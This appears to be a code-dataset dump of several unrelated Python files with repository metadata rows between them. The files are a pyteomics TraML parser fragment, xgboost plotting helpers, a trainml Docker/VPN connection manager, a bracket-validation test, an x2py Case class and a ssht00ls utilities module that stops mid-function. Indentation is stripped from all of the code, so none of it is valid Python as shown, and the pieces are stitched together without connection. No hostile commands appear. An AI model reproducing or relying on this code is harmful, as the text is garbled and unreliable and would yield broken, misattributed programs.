for k, v in dict(info).items():
if k[-3:] in {'Ref', 'ref'}:
if isinstance(v, str):
key = v
elif isinstance(v, dict):
key = v['ref']
else:
if k != 'ref':
info[k[:-3]] = info.pop(k)
continue
try:
by_id = self.get_by_id(key, retrieve_refs=True)
except KeyError:
warnings.warn('Ignoring unresolved reference: ' + key)
else:
if k == 'ref':
info.update(by_id)
else:
# by_id.pop('id', None)
info[k[:-3]] = by_id
del info[k]
def read(source, retrieve_refs=True, read_schema=False, iterative=True, use_index=False, huge_tree=False):
"""Parse `source` and iterate through transitions.
Parameters
----------
source : str or file
A path to a target TraML file or the file object itself.
retrieve_refs : bool, optional
If :py:const:`True`, additional information from references will be
automatically added to the results. The file processing time will
increase. Default is :py:const:`True`.
read_schema : bool, optional
If :py:const:`True`, attempt to extract information from the XML schema
mentioned in the TraML header. Otherwise, use default parameters.
Not recommended without Internet connection or
if you don't like to get the related warnings.
iterative : bool, optional
Defines whether iterative parsing should be used. It helps reduce
memory usage at almost the same parsing speed. Default is
:py:const:`True`.
use_index : bool, optional
Defines whether an index of byte offsets needs to be created for
spectrum elements. Default is :py:const:`False`.
huge_tree : bool, optional
This option is passed to the `lxml` parser and defines whether
security checks for XML tree depth and node size should be disabled.
Default is :py:const:`False`.
Enable this option for trusted files to avoid XMLSyntaxError exceptions
(e.g. `XMLSyntaxError: xmlSAX2Characters: huge text node`).
Returns
-------
out : TraML
A :py:class:`TraML` object, suitable for iteration and possibly random access.
"""
return TraML(source, retrieve_refs=retrieve_refs, read_schema=read_schema, iterative=iterative,
use_index=use_index, huge_tree=huge_tree)
def iterfind(source, path, **kwargs):
"""Parse `source` and yield info on elements with specified local
name or by specified "XPath".
.. note:: This function is provided for backward compatibility only.
If you do multiple :py:func:`iterfind` calls on one file, you should
create an :py:class:`TraML` object and use its
:py:meth:`!iterfind` method.
Parameters
----------
source : str or file
File name or file-like object.
path : str
Element name or XPath-like expression. Only local names separated
with slashes are accepted. An asterisk (`*`) means any element.
You can specify a single condition in the end, such as:
``"/path/to/element[some_value>1.5]"``
Note: you can do much more powerful filtering using plain Python.
The path can be absolute or "free". Please don't specify
namespaces.
recursive : bool, optional
If :py:const:`False`, subelements will not be processed when
extracting info from elements. Default is :py:const:`True`.
iterative : bool, optional
Specifies whether iterative XML parsing should be used. Iterative
parsing significantly reduces memory usage and may be just a little
slower. When `retrieve_refs` is :py:const:`True`, however, it is
highly recommended to disable iterative parsing if possible.
Default value is :py:const:`True`.
read_schema : bool, optional
If :py:const:`True`, attempt to extract information from the XML schema
        mentioned in the TraML header. Otherwise, use default
parameters. Not recommended without Internet connection or
if you don't like to get the related warnings.
Returns
-------
out : iterator
"""
return TraML(source, **kwargs).iterfind(path, **kwargs)
version_info = xml._make_version_info(TraML)
chain = aux.ChainBase._make_chain(TraML)
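# Hedged usage sketch (not part of the original module); 'targets.TraML' is a
# placeholder file name.
#
#   from pyteomics import traml
#
#   with traml.read('targets.TraML') as transitions:
#       for transition in transitions:
#           print(transition)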
| 37.483051
| 107
| 0.626159
|
794e5954361d8fce7efee847b5cc89291be9faae
| 8,313
|
py
|
Python
|
python-package/xgboost/plotting.py
|
cool-RR/xgboost
|
306e38ff3145b559e3a7c67d071d8a4ced5f70a3
|
[
"Apache-2.0"
] | 1
|
2020-12-28T06:19:54.000Z
|
2020-12-28T06:19:54.000Z
|
python-package/xgboost/plotting.py
|
cool-RR/xgboost
|
306e38ff3145b559e3a7c67d071d8a4ced5f70a3
|
[
"Apache-2.0"
] | 1
|
2021-09-22T19:06:13.000Z
|
2021-09-22T19:06:13.000Z
|
python-package/xgboost/plotting.py
|
cool-RR/xgboost
|
306e38ff3145b559e3a7c67d071d8a4ced5f70a3
|
[
"Apache-2.0"
] | null | null | null |
# pylint: disable=too-many-locals, too-many-arguments, invalid-name,
# pylint: disable=too-many-branches
# coding: utf-8
"""Plotting Library."""
from io import BytesIO
import numpy as np
from .core import Booster
from .sklearn import XGBModel
def plot_importance(booster, ax=None, height=0.2,
xlim=None, ylim=None, title='Feature importance',
xlabel='F score', ylabel='Features', fmap='',
importance_type='weight', max_num_features=None,
grid=True, show_values=True, **kwargs):
"""Plot importance based on fitted trees.
Parameters
----------
booster : Booster, XGBModel or dict
Booster or XGBModel instance, or dict taken by Booster.get_fscore()
ax : matplotlib Axes, default None
Target axes instance. If None, new figure and axes will be created.
grid : bool, Turn the axes grids on or off. Default is True (On).
importance_type : str, default "weight"
How the importance is calculated: either "weight", "gain", or "cover"
* "weight" is the number of times a feature appears in a tree
* "gain" is the average gain of splits which use the feature
* "cover" is the average coverage of splits which use the feature
where coverage is defined as the number of samples affected by the split
max_num_features : int, default None
Maximum number of top features displayed on plot. If None, all features will be displayed.
height : float, default 0.2
Bar height, passed to ax.barh()
xlim : tuple, default None
Tuple passed to axes.xlim()
ylim : tuple, default None
Tuple passed to axes.ylim()
title : str, default "Feature importance"
Axes title. To disable, pass None.
xlabel : str, default "F score"
X axis title label. To disable, pass None.
ylabel : str, default "Features"
Y axis title label. To disable, pass None.
fmap: str or os.PathLike (optional)
The name of feature map file.
show_values : bool, default True
Show values on plot. To disable, pass False.
kwargs :
Other keywords passed to ax.barh()
Returns
-------
ax : matplotlib Axes
"""
try:
import matplotlib.pyplot as plt
except ImportError:
raise ImportError('You must install matplotlib to plot importance')
if isinstance(booster, XGBModel):
importance = booster.get_booster().get_score(
importance_type=importance_type, fmap=fmap)
elif isinstance(booster, Booster):
importance = booster.get_score(importance_type=importance_type, fmap=fmap)
elif isinstance(booster, dict):
importance = booster
else:
raise ValueError('tree must be Booster, XGBModel or dict instance')
if not importance:
raise ValueError(
'Booster.get_score() results in empty. ' +
'This maybe caused by having all trees as decision dumps.')
tuples = [(k, importance[k]) for k in importance]
if max_num_features is not None:
# pylint: disable=invalid-unary-operand-type
tuples = sorted(tuples, key=lambda x: x[1])[-max_num_features:]
else:
tuples = sorted(tuples, key=lambda x: x[1])
labels, values = zip(*tuples)
if ax is None:
_, ax = plt.subplots(1, 1)
ylocs = np.arange(len(values))
ax.barh(ylocs, values, align='center', height=height, **kwargs)
if show_values is True:
for x, y in zip(values, ylocs):
ax.text(x + 1, y, x, va='center')
ax.set_yticks(ylocs)
ax.set_yticklabels(labels)
if xlim is not None:
if not isinstance(xlim, tuple) or len(xlim) != 2:
raise ValueError('xlim must be a tuple of 2 elements')
else:
xlim = (0, max(values) * 1.1)
ax.set_xlim(xlim)
if ylim is not None:
if not isinstance(ylim, tuple) or len(ylim) != 2:
raise ValueError('ylim must be a tuple of 2 elements')
else:
ylim = (-1, len(values))
ax.set_ylim(ylim)
if title is not None:
ax.set_title(title)
if xlabel is not None:
ax.set_xlabel(xlabel)
if ylabel is not None:
ax.set_ylabel(ylabel)
ax.grid(grid)
return ax
def to_graphviz(booster, fmap='', num_trees=0, rankdir=None,
yes_color=None, no_color=None,
condition_node_params=None, leaf_node_params=None, **kwargs):
"""Convert specified tree to graphviz instance. IPython can automatically plot
    the returned graphviz instance. Otherwise, you should call the .render() method
    of the returned graphviz instance.
Parameters
----------
booster : Booster, XGBModel
Booster or XGBModel instance
fmap: str (optional)
The name of feature map file
num_trees : int, default 0
Specify the ordinal number of target tree
rankdir : str, default "UT"
        Passed to graphviz via graph_attr
    yes_color : str, default '#0000FF'
        Edge color when the node condition is met.
    no_color : str, default '#FF0000'
        Edge color when the node condition is not met.
condition_node_params : dict, optional
        Condition node configuration for graphviz. Example:
.. code-block:: python
{'shape': 'box',
'style': 'filled,rounded',
'fillcolor': '#78bceb'}
leaf_node_params : dict, optional
Leaf node configuration for graphviz. Example:
.. code-block:: python
{'shape': 'box',
'style': 'filled',
'fillcolor': '#e48038'}
\\*\\*kwargs: dict, optional
Other keywords passed to graphviz graph_attr, e.g. ``graph [ {key} = {value} ]``
Returns
-------
graph: graphviz.Source
"""
try:
from graphviz import Source
except ImportError:
raise ImportError('You must install graphviz to plot tree')
if isinstance(booster, XGBModel):
booster = booster.get_booster()
# squash everything back into kwargs again for compatibility
parameters = 'dot'
extra = {}
for key, value in kwargs.items():
extra[key] = value
if rankdir is not None:
kwargs['graph_attrs'] = {}
kwargs['graph_attrs']['rankdir'] = rankdir
for key, value in extra.items():
if 'graph_attrs' in kwargs.keys():
kwargs['graph_attrs'][key] = value
else:
kwargs['graph_attrs'] = {}
del kwargs[key]
if yes_color is not None or no_color is not None:
kwargs['edge'] = {}
if yes_color is not None:
kwargs['edge']['yes_color'] = yes_color
if no_color is not None:
kwargs['edge']['no_color'] = no_color
if condition_node_params is not None:
kwargs['condition_node_params'] = condition_node_params
if leaf_node_params is not None:
kwargs['leaf_node_params'] = leaf_node_params
if kwargs:
parameters += ':'
parameters += str(kwargs)
tree = booster.get_dump(
fmap=fmap,
dump_format=parameters)[num_trees]
g = Source(tree)
return g
def plot_tree(booster, fmap='', num_trees=0, rankdir=None, ax=None, **kwargs):
"""Plot specified tree.
Parameters
----------
booster : Booster, XGBModel
Booster or XGBModel instance
fmap: str (optional)
The name of feature map file
num_trees : int, default 0
Specify the ordinal number of target tree
rankdir : str, default "TB"
        Passed to graphviz via graph_attr
ax : matplotlib Axes, default None
Target axes instance. If None, new figure and axes will be created.
kwargs :
Other keywords passed to to_graphviz
Returns
-------
ax : matplotlib Axes
"""
try:
from matplotlib import pyplot as plt
from matplotlib import image
except ImportError:
raise ImportError('You must install matplotlib to plot tree')
if ax is None:
_, ax = plt.subplots(1, 1)
g = to_graphviz(booster, fmap=fmap, num_trees=num_trees, rankdir=rankdir,
**kwargs)
s = BytesIO()
s.write(g.pipe(format='png'))
s.seek(0)
img = image.imread(s)
ax.imshow(img)
ax.axis('off')
return ax
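# Hedged usage sketch (not part of the original module). The random data,
# parameters and output file name are illustrative only.
#
#   import numpy as np
#   import xgboost as xgb
#
#   X = np.random.rand(200, 5)
#   y = np.random.randint(2, size=200)
#   booster = xgb.train({'objective': 'binary:logistic'},
#                       xgb.DMatrix(X, label=y), num_boost_round=10)
#   ax = xgb.plot_importance(booster, max_num_features=5)
#   ax.figure.savefig('importance.png')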
| 32.346304
| 98
| 0.624564
|
794e599b74bf3be17803e580b283e14439c9f1b4
| 14,302
|
py
|
Python
|
trainml/connections.py
|
trainML/trainml-cli
|
3065ed4cacf415964bcfc8c3854dd8acbc3729c5
|
[
"MIT"
] | 1
|
2021-02-11T16:08:05.000Z
|
2021-02-11T16:08:05.000Z
|
trainml/connections.py
|
trainML/trainml-cli
|
3065ed4cacf415964bcfc8c3854dd8acbc3729c5
|
[
"MIT"
] | 1
|
2021-05-04T00:20:28.000Z
|
2021-07-07T16:21:35.000Z
|
trainml/connections.py
|
trainML/trainml-cli
|
3065ed4cacf415964bcfc8c3854dd8acbc3729c5
|
[
"MIT"
] | null | null | null |
import json
import os
import shutil
import asyncio
import aiohttp
import aiodocker
import zipfile
import re
import logging
from datetime import datetime
from .exceptions import ConnectionError, ApiError, SpecificationError
from aiodocker.exceptions import DockerError
VPN_IMAGE = "trainml/tinc:no-upnp"
STORAGE_IMAGE = "trainml/local-storage"
STATUSES = dict(
UNKNOWN="unknown",
NEW="new",
CONNECTING="connecting",
CONNECTED="connected",
NOT_CONNECTED="not connected",
STOPPED="stopped",
REMOVED="removed",
)
class Connections(object):
def __init__(self, trainml):
self.trainml = trainml
CONFIG_DIR = os.path.expanduser(
os.environ.get("TRAINML_CONFIG_DIR") or "~/.trainml"
)
self.dir = f"{CONFIG_DIR}/connections"
os.makedirs(
self.dir,
exist_ok=True,
)
async def list(self):
con_dirs = os.listdir(self.dir)
connections = []
con_tasks = []
for con_dir in con_dirs:
try:
con_type, con_id = con_dir.split("_")
except ValueError:
# unintelligible directory
continue
connection = Connection(self.trainml, con_type, con_id)
connections.append(connection)
con_task = asyncio.create_task(connection.check())
con_tasks.append(con_task)
await asyncio.gather(*con_tasks)
return connections
async def cleanup(self):
con_dirs = os.listdir(self.dir)
await asyncio.gather(
asyncio.create_task(
_cleanup_containers(self.dir, con_dirs, "vpn")
),
asyncio.create_task(
_cleanup_containers(self.dir, con_dirs, "storage")
),
)
async def remove_all(self):
shutil.rmtree(self.dir)
os.makedirs(
self.dir,
exist_ok=True,
)
await self.cleanup()
class Connection:
def __init__(self, trainml, entity_type, id, entity=None, **kwargs):
self.trainml = trainml
self._id = id
self._type = entity_type
self._status = STATUSES.get("UNKNOWN")
self._entity = entity
CONFIG_DIR = os.path.expanduser(
os.environ.get("TRAINML_CONFIG_DIR") or "~/.trainml"
)
CONNECTIONS_DIR = f"{CONFIG_DIR}/connections"
self._dir = f"{CONNECTIONS_DIR}/{entity_type}_{id}"
os.makedirs(
self._dir,
exist_ok=True,
)
@property
def id(self) -> str:
return self._id
@property
def type(self) -> str:
return self._type
@property
def status(self) -> str:
return self._status
def __str__(self):
return f"Connection for {self.type} - {self.id}: {self.status}"
def __repr__(self):
return f"Connection( trainml , {self.id}, {self.type})"
async def _get_entity(self):
if self.type == "dataset":
self._entity = await self.trainml.datasets.get(self.id)
elif self.type == "job":
self._entity = await self.trainml.jobs.get(self.id)
elif self.type == "model":
self._entity = await self.trainml.models.get(self.id)
else:
raise TypeError(
"Connection type must be in: ['dataset', 'model', 'job']"
)
async def _download_connection_details(self):
zip_file = f"{self._dir}/details.zip"
url = await self._entity.get_connection_utility_url()
async with aiohttp.ClientSession() as session:
async with session.request("GET", url) as resp:
with open(
zip_file,
"wb",
) as fd:
content = await resp.read()
fd.write(content)
with zipfile.ZipFile(zip_file, "r") as zipf:
for info in zipf.infolist():
extracted_path = zipf.extract(info, self._dir)
if info.create_system == 3 and os.path.isfile(
extracted_path
): ## 3 - ZIP_UNIX_SYSTEM
unix_attributes = info.external_attr >> 16
if unix_attributes:
os.chmod(extracted_path, unix_attributes)
os.remove(zip_file)
async def _test_connection(self, container):
entity_details = self._entity.get_connection_details()
if not entity_details:
return False
net = _parse_cidr(entity_details.get("cidr"))
target_ip = f"{net.get('first_octet')}.{net.get('second_octet')}.{net.get('third_octet')}.254"
logging.debug("")
ping = await container.exec(
["ping", "-c", "1", target_ip],
stdout=True,
stderr=True,
)
stream = ping.start()
await stream.read_out()
data = await ping.inspect()
while data["ExitCode"] is None:
await stream.read_out()
data = await ping.inspect()
await stream.close()
if data["ExitCode"] == 0:
return True
return False
async def check(self):
if not self._entity:
try:
await self._get_entity()
except ApiError as e:
                if e.status == 404:
                    self._status = STATUSES.get("REMOVED")
                    shutil.rmtree(self._dir)
                    return
                else:
                    raise e
if not os.path.isdir(f"{self._dir}/data"):
self._status = STATUSES.get("NEW")
return
try:
with open(f"{self._dir}/vpn_id", "r") as f:
vpn_id = f.read()
except OSError as e:
self._status = STATUSES.get("STOPPED")
return
docker = aiodocker.Docker()
try:
container = await docker.containers.get(vpn_id)
except DockerError as e:
if e.status == 404:
self._status = STATUSES.get("STOPPED")
await docker.close()
return
raise e
data = await container.show()
if not data["State"]["Running"]:
self._status = STATUSES.get("STOPPED")
await container.delete()
os.remove(f"{self._dir}/vpn_id")
try:
with open(f"{self._dir}/storage_id", "r") as f:
storage_id = f.read()
try:
storage_container = await docker.containers.get(storage_id)
await storage_container.delete(force=True)
except DockerError as e:
if e.status != 404:
raise e
except OSError as e:
pass
await docker.close()
return
connected = await self._test_connection(container)
await docker.close()
if connected:
self._status = STATUSES.get("CONNECTED")
else:
self._status = STATUSES.get("NOT_CONNECTED")
async def start(self):
logging.debug(f"Beginning start {self.type} connection {self.id}")
if self.status == STATUSES.get("UNKNOWN"):
await self.check()
if self.status in [
STATUSES.get("CONNECTING"),
STATUSES.get("CONNECTED"),
STATUSES.get("NOT_CONNECTED"),
]:
raise SpecificationError(
"status", "Only inactive connections can be started."
)
self._status = STATUSES.get("CONNECTING")
logging.info(f"Connecting...")
if not self._entity:
await self._get_entity()
if not os.path.isdir(f"{self._dir}/data"):
await self._download_connection_details()
docker = aiodocker.Docker()
await asyncio.gather(
docker.pull(VPN_IMAGE), docker.pull(STORAGE_IMAGE)
)
entity_details = self._entity.get_connection_details()
if (
entity_details.get("model_path")
or entity_details.get("input_path")
or entity_details.get("output_path")
):
logging.debug(f"Starting storage container")
storage_container = await docker.containers.run(
_get_storage_container_config(
self.id,
entity_details.get("cidr"),
f"{self._dir}/data",
entity_details.get("ssh_port"),
model_path=entity_details.get("model_path"),
input_path=entity_details.get("input_path"),
output_path=entity_details.get("output_path"),
)
)
logging.debug(
f"Storage container started, id: {storage_container.id}"
)
with open(f"{self._dir}/storage_id", "w") as f:
f.write(storage_container.id)
logging.debug(f"Starting VPN container")
vpn_container = await docker.containers.run(
_get_vpn_container_config(
self.id, entity_details.get("cidr"), f"{self._dir}/data"
)
)
logging.debug(f"VPN container started, id: {vpn_container.id}")
with open(f"{self._dir}/vpn_id", "w") as f:
f.write(vpn_container.id)
count = 0
while count <= 30:
logging.debug(f"Test connectivity attempt {count+1}")
res = await self._test_connection(vpn_container)
if res:
logging.debug(f"Test connectivity successful {count+1}")
break
count += 1
await docker.close()
if count > 30:
self._status = STATUSES.get("NOT_CONNECTED")
raise ConnectionError(f"Unable to connect {self.type} {self.id}")
self._status = STATUSES.get("CONNECTED")
logging.info(f"Connection Successful.")
logging.debug(f"Completed start {self.type} connection {self.id}")
async def stop(self):
logging.debug(f"Beginning stop {self.type} connection {self.id}")
if not self._entity:
await self._get_entity()
docker = aiodocker.Docker()
tasks = []
logging.info("Disconnecting...")
try:
with open(f"{self._dir}/vpn_id", "r") as f:
vpn_id = f.read()
logging.debug(f"vpn container id: {vpn_id}")
vpn_container = await docker.containers.get(vpn_id)
vpn_delete_task = asyncio.create_task(
vpn_container.delete(force=True)
)
tasks.append(vpn_delete_task)
os.remove(f"{self._dir}/vpn_id")
except OSError:
logging.debug("vpn container not found")
storage_delete_task = None
try:
with open(f"{self._dir}/storage_id", "r") as f:
storage_id = f.read()
logging.debug(f"storage container id: {vpn_id}")
storage_container = await docker.containers.get(storage_id)
storage_delete_task = asyncio.create_task(
storage_container.delete(force=True)
)
tasks.append(storage_delete_task)
os.remove(f"{self._dir}/storage_id")
except OSError:
logging.debug("storage container not found")
await asyncio.gather(*tasks)
await docker.close()
self._status = STATUSES.get("REMOVED")
shutil.rmtree(self._dir)
logging.info("Disconnected.")
logging.debug(f"Completed stop {self.type} connection {self.id}")
async def _cleanup_containers(path, con_dirs, type):
containers_target = []
for con_dir in con_dirs:
try:
with open(f"{path}/{con_dir}/{type}_id", "r") as f:
id = f.read()
containers_target.append(id)
except OSError:
continue
docker = aiodocker.Docker()
containers = await docker.containers.list(
all=True,
filters=json.dumps(dict(label=["service=trainml", f"type={type}"])),
)
tasks = [
asyncio.create_task(container.delete(force=True))
for container in containers
if container.id not in containers_target
]
await asyncio.gather(*tasks)
await docker.close()
def _parse_cidr(cidr):
res = re.match(
r"(?P<first_octet>[0-9]{1,3})\.(?P<second_octet>[0-9]{1,3})\.(?P<third_octet>[0-9]{1,3})\.(?P<fourth_octet>[0-9]{1,3})/(?P<mask_length>[0-9]{1,2})",
cidr,
)
net = res.groupdict()
return net
def _get_vpn_container_config(id, cidr, data_dir):
config = dict(
Image=VPN_IMAGE,
Hostname=id,
Cmd=[],
AttachStdin=False,
AttachStdout=False,
AttachStderr=False,
Tty=False,
Env=[
f"NETWORK={id}",
"DEBUG=1",
],
HostConfig=dict(
Init=True,
Binds=[f"{data_dir}:/etc/tinc:rw"],
NetworkMode="host",
CapAdd=["NET_ADMIN"],
),
Labels=dict(type="vpn", service="trainml", id=id),
)
return config
def _get_storage_container_config(
id,
cidr,
data_dir,
ssh_port,
model_path=None,
input_path=None,
output_path=None,
):
Binds = [f"{data_dir}/.ssh:/opt/ssh"]
if model_path:
Binds.append(f"{os.path.expanduser(model_path)}:/opt/model:ro")
if input_path:
Binds.append(f"{os.path.expanduser(input_path)}:/opt/data:ro")
if output_path:
Binds.append(f"{os.path.expanduser(output_path)}:/opt/output:rw")
config = dict(
Image=STORAGE_IMAGE,
Hostname=id,
Cmd=[],
AttachStdin=False,
AttachStdout=False,
AttachStderr=False,
Tty=False,
Env=[
f"VPN_CIDR={cidr}",
],
ExposedPorts={f"22/tcp": {}},
HostConfig=dict(
Init=True,
Binds=Binds,
PortBindings={
f"22/tcp": [dict(HostPort=f"{ssh_port}", HostIP="0.0.0.0")],
},
),
Labels=dict(type="storage", service="trainml", id=id),
)
return config
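# Hedged usage sketch (not part of the original module). The client import
# path, credentials handling and dataset id are assumptions; the call pattern
# mirrors how Connections.list() constructs Connection objects above.
#
#   import asyncio
#   from trainml import TrainML  # import path assumed
#
#   async def demo():
#       client = TrainML()  # assumes credentials are already configured
#       connection = Connection(client, "dataset", "<dataset-id>")
#       await connection.start()
#       print(connection.status)
#       await connection.stop()
#
#   asyncio.run(demo())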
| 32.357466
| 156
| 0.550482
|
794e59abab1d60ef28544cb699deaef53af8f3c4
| 794
|
py
|
Python
|
python/tests/test_multi_bracket_validation.py
|
M7madMomani2/data-structures-and-algorithms
|
35ba48973d45f6972d097e4aaac7cfb7147a83a2
|
[
"MIT"
] | null | null | null |
python/tests/test_multi_bracket_validation.py
|
M7madMomani2/data-structures-and-algorithms
|
35ba48973d45f6972d097e4aaac7cfb7147a83a2
|
[
"MIT"
] | null | null | null |
python/tests/test_multi_bracket_validation.py
|
M7madMomani2/data-structures-and-algorithms
|
35ba48973d45f6972d097e4aaac7cfb7147a83a2
|
[
"MIT"
] | 1
|
2021-08-29T20:16:19.000Z
|
2021-08-29T20:16:19.000Z
|
import pytest
from challenges.multi_bracket_validation.multi_bracket_validation import *
def test_valid_data():
    actual1 = multi_bracket_validation('(){}')
    actual2 = multi_bracket_validation('()[[Extra Characters]]')
    actual3 = multi_bracket_validation('({[]})')
    actual4 = multi_bracket_validation('({()})')
    expected = True
    assert actual1 == expected
    assert actual2 == expected
    assert actual3 == expected
    assert actual4 == expected
def test_invalid_data():
    actual1 = multi_bracket_validation('({()}')
    actual2 = multi_bracket_validation('({())')
    actual3 = multi_bracket_validation('({())))')
    actual4 = multi_bracket_validation('({()]')
    expected = False
    assert actual1 == expected
    assert actual2 == expected
    assert actual3 == expected
    assert actual4 == expected
| 30.538462
| 74
| 0.720403
|
794e5a26a1e643dfb7d64f37e50a012b1af926e3
| 3,103
|
py
|
Python
|
x2py/case.py
|
jaykang920/x2py
|
b8bd473f94ff4b9576e984cc384f4159ab71278d
|
[
"MIT"
] | null | null | null |
x2py/case.py
|
jaykang920/x2py
|
b8bd473f94ff4b9576e984cc384f4159ab71278d
|
[
"MIT"
] | 1
|
2019-06-05T09:35:09.000Z
|
2020-07-02T09:46:46.000Z
|
x2py/case.py
|
jaykang920/x2py
|
b8bd473f94ff4b9576e984cc384f4159ab71278d
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2017, 2018 Jae-jun Kang
# See the file LICENSE for details.
from x2py.event_sink import EventSink
from x2py.util.trace import Trace
class Case(EventSink):
"""Represents a set of application logic."""
def __init__(self):
super(Case, self).__init__()
def setup_with(self, flow):
"""Initializes this case with the specified holding flow."""
self.flow = flow
from x2py.flow import Flow
backup = Flow.thread_local.current
Flow.thread_local.current = flow
self._setup()
Flow.thread_local.current = backup
def teardown_with(self, flow):
"""Cleans up this case with the specified holding flow."""
from x2py.flow import Flow
backup = Flow.thread_local.current
Flow.thread_local.current = flow
self._teardown()
Flow.thread_local.current = backup
self.cleanup() # eventsink cleanup
def setup(self):
"""Overridden by subclasses to build a initialization chain."""
pass
def teardown(self):
"""Overridden by subclasses to build a cleanup chain."""
pass
def on_start(self):
"""Overridden by subclasses to build a flow startup handler chain."""
pass
def on_stop(self):
"""Overridden by subclasses to build a flow shutdown handler chain."""
pass
def _setup(self):
"""Called internally when this case is initialized."""
self.setup()
def _teardown(self):
"""Called internally when this case is cleaned up."""
self.teardown()
class CaseStack(object):
"""Handles a group of cases."""
def __init__(self):
self.cases = []
self.activated = False
def add(self, case):
if case is None or not isinstance(case, Case):
raise TypeError()
if case in self.cases:
return False
self.cases.append(case)
return True
def remove(self, case):
if case is None or not isinstance(case, Case):
raise TypeError()
if case not in self.cases:
return False
self.cases.remove(case)
return True
def setup_with(self, flow):
if self.activated:
return
self.activated = True
for case in self.cases:
Trace.trace("casestack: setting up case {}", type(case).__name__)
case.setup_with(flow)
def teardown_with(self, flow):
if not self.activated:
return
self.activated = False
for case in reversed(self.cases):
try:
Trace.trace("casestack: tearing down case {}", type(case).__name__)
case.teardown_with(flow)
except BaseException as ex:
Trace.error("{} {} teardown: {}", flow.name, type(case).__name__, ex)
def on_start(self):
for case in self.cases:
case.on_start()
def on_stop(self):
for case in reversed(self.cases):
try:
case.on_stop()
except:
pass
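# Hedged usage sketch (not part of the original module): a minimal Case
# subclass overriding the documented hooks.
#
#   class MyCase(Case):
#       def setup(self):
#           Trace.trace("MyCase setup")
#       def teardown(self):
#           Trace.trace("MyCase teardown")
#
# A holding flow then activates it via setup_with(flow) / teardown_with(flow),
# typically through its CaseStack.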
| 27.460177
| 85
| 0.588141
|
794e5dccdc42a5d639222239fa58a7d4cebe11a3
| 5,829
|
py
|
Python
|
ssht00ls/classes/utils/__init__.py
|
vandenberghinc/ssht00ls
|
e08081773c8da7dfac0764170bfeacb4bf421ec1
|
[
"CNRI-Python"
] | 5
|
2021-02-18T17:46:39.000Z
|
2021-12-29T15:48:07.000Z
|
ssht00ls/classes/utils/__init__.py
|
vandenberghinc/ssht00ls
|
e08081773c8da7dfac0764170bfeacb4bf421ec1
|
[
"CNRI-Python"
] | null | null | null |
ssht00ls/classes/utils/__init__.py
|
vandenberghinc/ssht00ls
|
e08081773c8da7dfac0764170bfeacb4bf421ec1
|
[
"CNRI-Python"
] | 2
|
2021-03-19T14:06:20.000Z
|
2021-09-26T14:08:34.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# imports.
from ssht00ls.classes.config import *
import os, sys, requests, ast, json, pathlib, glob, string, getpass, django, random, subprocess, time
# save config file safely.
def save_config_safely(backup=True, __loader__=None, __keyboard_interrupt__=None):
if backup: save_config_backup_safely()
try:
CONFIG.save()
except KeyboardInterrupt as e:
if __loader__ == None:
__loader__ = dev0s.console.Loader("&RED&Do not interrupt!&END& Saving ssht00ls config file.")
return save_config_safely(backup=False, __loader__=__loader__, __keyboard_interrupt__=e)
if __loader__ != None: __loader__.stop()
if __keyboard_interrupt__ != None:
raise KeyboardInterrupt(__keyboard_interrupt__)
# save backup of config file safely.
def save_config_backup_safely(__loader__=None):
path = DATABASE.join(".backups")
if not Files.exists(path): Files.create(path, directory=True)
path += "/config/"
if not Files.exists(path): Files.create(path, directory=True)
path += f"/{Date().date}"
try:
Files.save(path, CONFIG.dictionary, format="json")
except KeyboardInterrupt as e:
if __loader__ == None:
__loader__ = dev0s.console.Loader("&RED&Do not interrupt!&END& Saving backup of ssht00ls config file.")
return save_config_backup_safely(__loader__=__loader__)
if __loader__ != None: __loader__.stop()
fp = FilePath(gfp.base(path))
if fp.size(format=int, mode="mb") >= 5:
fp.delete(forced=True)
fp.create(directory=True)
# check / start the ssh agent (due to circular import keep it over here for classes: [aliases]).
def ssh_agent():
"""
SSH_AUTH_SOCK = os.environ.get("SSH_AUTH_SOCK")
SSH_AGENT_PID = os.environ.get("SSH_AGENT_PID")
"""
"""
try:
output = utils.__execute__([f"ssh-add", "-D"])
except: a=1
try:
output = utils.__execute__([f"ssh-add", "-k"])
except: a=1
"""
# version 2.
if len(dev0s.code.processes(includes="ssh-agent").processes) >= 10:
dev0s.code.execute(f"pkill -9 -f ssh-agent")
try:
output = dev0s.code.execute(f"ssh-agent")
if not output.success: output.crash()
output = str(output)
try:
SSH_AUTH_SOCK = output.split("SSH_AUTH_SOCK=")[1].split(";")[0]
os.environ["SSH_AUTH_SOCK"] = SSH_AUTH_SOCK
except: return None
try:
SSH_AGENT_PID = output.split("SSH_AGENT_PID=")[1].split(";")[0]
os.environ["SSH_AGENT_PID"] = SSH_AGENT_PID
except: return None
except: return None
os.environ["SSH_AUTH_SOCK"] = SSH_AUTH_SOCK
os.environ["SSH_AGENT_PID"] = SSH_AGENT_PID
# converting variables.
def __array_to_string__(array, joiner=" "):
string = ""
for i in array:
if string == "": string = str(i)
else: string += joiner+str(i)
return string
def __string_to_boolean__(string):
if string in ["true", "True", True]: return True
elif string in ["false", "False", False]: return False
else: raise ValueError(f"Could not convert string [{string}] to a boolean.")
def __string_to_bash__(string):
a = string.replace('(','\(').replace(')','\)').replace("'","\'").replace(" ","\ ").replace("$","\$").replace("!","\!").replace("?","\?").replace("@","\@").replace("$","\$").replace("%","\%").replace("^","\^").replace("&","\&").replace("*","\*").replace("'","\'").replace('"','\"')
return a
# generation.
def __generate_pincode__(characters=6, charset=string.digits):
return ''.join(random.choice(charset) for x in range(characters))
#
# execute a shell command.
def __execute__(
# the command in array.
command=[],
# wait till the command is pinished.
wait=False,
# the commands timeout, [timeout] overwrites parameter [wait].
timeout=None,
# the commands output return format: string / array.
return_format="string",
# the subprocess.Popen.shell argument.
shell=False,
# pass a input string to the process.
input=None,
):
def __convert__(byte_array, return_format=return_format):
if return_format == "string":
lines = ""
for line in byte_array:
lines += line.decode()
return lines
elif return_format == "array":
lines = []
for line in byte_array:
lines.append(line.decode().replace("\n","").replace("\\n",""))
return lines
# create process.
if isinstance(command, str): command = command.split(' ')
p = subprocess.Popen(
command,
shell=shell,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,)
# send input.
if input != None:
if isinstance(input, list):
for s in input:
p.stdin.write(f'{s}\n'.encode())
elif isinstance(input, str):
p.stdin.write(f'{input}\n'.encode())
else: raise ValueError("Invalid format for parameter [input] required format: [string, array].")
p.stdin.flush()
# timeout.
if timeout != None:
time.sleep(timeout)
p.terminate()
# await.
elif wait:
p.wait()
# get output.
